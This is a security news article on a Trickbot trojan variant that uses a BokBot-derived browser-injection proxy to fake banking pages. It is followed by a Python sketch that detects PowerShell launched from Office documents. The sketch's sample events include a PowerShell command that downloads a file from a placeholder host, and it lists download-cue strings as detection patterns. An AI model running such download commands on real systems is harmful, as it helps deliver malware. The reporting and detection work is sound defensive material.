Trickbot Trojan variant targets banking

The creators of the notorious Trickbot Trojan appear to be continuing to evolve their malware, adding a new custom component derived from BokBot code that is used in web-injection attacks and affects popular browsers.

BokBot, also known as IcedID, was first discovered by IBM's X-Force team at the end of 2017 and is also a banking trojan. It can redirect its victims to bogus online banking sites, and it can also attach to a browser and display fake content on banks' front pages.

Security researcher Brad Duncan recently observed a Trickbot sample containing the new web-injection component being downloaded by the Ursnif (aka Gozi ISFB) malware.

The attack starts with an infected Office Word file that runs a PowerShell script to download the Ursnif trojan. The infected device also receives the Trickbot variant containing the BokBot / IcedID component, which can monitor and modify web traffic.

A system infected with the new version of Trickbot was discovered on July 5 and contains a configuration file.

Another security researcher who studied the trojan's new component, Vitali Kremez, found that it can attach to the Google Chrome, Mozilla Firefox, Internet Explorer and Microsoft Edge browsers.

Further analysis revealed its similarity to the BokBot man-in-the-browser tool, which is used to inject false data into the results shown to the victim.

In a Twitter thread, Kremez notes that the interesting part is that this component seems to have been tailored specifically for TrickBot or other banking-fraud operations based on the installer of this malware family.

The malicious add-on acts as a local proxy server, sitting between the client and the online banking service. From this position, it can insert a fake page for the bank the user was looking for and collect financial information.
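The first stage described above (a Word document launching PowerShell to fetch Ursnif) is visible in process-creation logs. The following is an added detection sketch, not code from the article or the researchers; the event field names, PIDs, paths, URL and download cues are constructed assumptions, and it goes slightly beyond the text by covering other Office applications and an intermediate `cmd.exe`.

```python
from pathlib import PureWindowsPath

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Substrings that suggest the script fetches a remote file (assumed cue list).
DOWNLOAD_CUES = ("downloadfile", "downloadstring", "invoke-webrequest",
                 "start-bitstransfer", "-encodedcommand")

# Constructed process-creation events (Sysmon Event ID 1 style); not real incident data.
SAMPLE_EVENTS = [
    {"pid": 900, "ppid": 4, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4120, "ppid": 900, "image": r"C:\Program Files\Microsoft Office\WINWORD.EXE",
     "cmdline": "WINWORD.EXE /n invoice.doc"},
    {"pid": 4388, "ppid": 4120, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd.exe /c powershell ..."},
    {"pid": 4412, "ppid": 4388, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoProfile Invoke-WebRequest http://example.invalid/x -OutFile x.bin"},
    {"pid": 4500, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe -File C:\Users\u\report.ps1"},
    {"pid": 5000, "ppid": 900, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe Get-ChildItem"},
]

def basename(image):
    return PureWindowsPath(image).name.lower()

def office_ancestor(event, by_pid, max_depth=4):
    """Walk parent links upward; return the Office ancestor's name, or None."""
    seen, ppid = set(), event["ppid"]
    for _ in range(max_depth):
        parent = by_pid.get(ppid)
        if parent is None or ppid in seen:  # unknown parent or a PID loop
            return None
        seen.add(ppid)
        if basename(parent["image"]) in OFFICE:
            return basename(parent["image"])
        ppid = parent["ppid"]
    return None

def detect(events):
    """Flag PowerShell descended from Office; 'high' when download cues are present."""
    by_pid = {e["pid"]: e for e in events}  # assumes no PID reuse within the window
    alerts = []
    for e in events:
        if basename(e["image"]) not in SHELLS:
            continue
        ancestor = office_ancestor(e, by_pid)
        if ancestor:
            cues = [c for c in DOWNLOAD_CUES if c in e["cmdline"].lower()]
            alerts.append({"pid": e["pid"], "ancestor": ancestor, "cues": cues,
                           "severity": "high" if cues else "medium"})
    return alerts
```

PowerShell started from Explorer (PID 5000 in the sample) is not flagged; only shells with an Office application in their ancestry are.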

The author allows you to copy his / her text only if you credit the source (SecNews.gr) with the web address (live URL) of the article.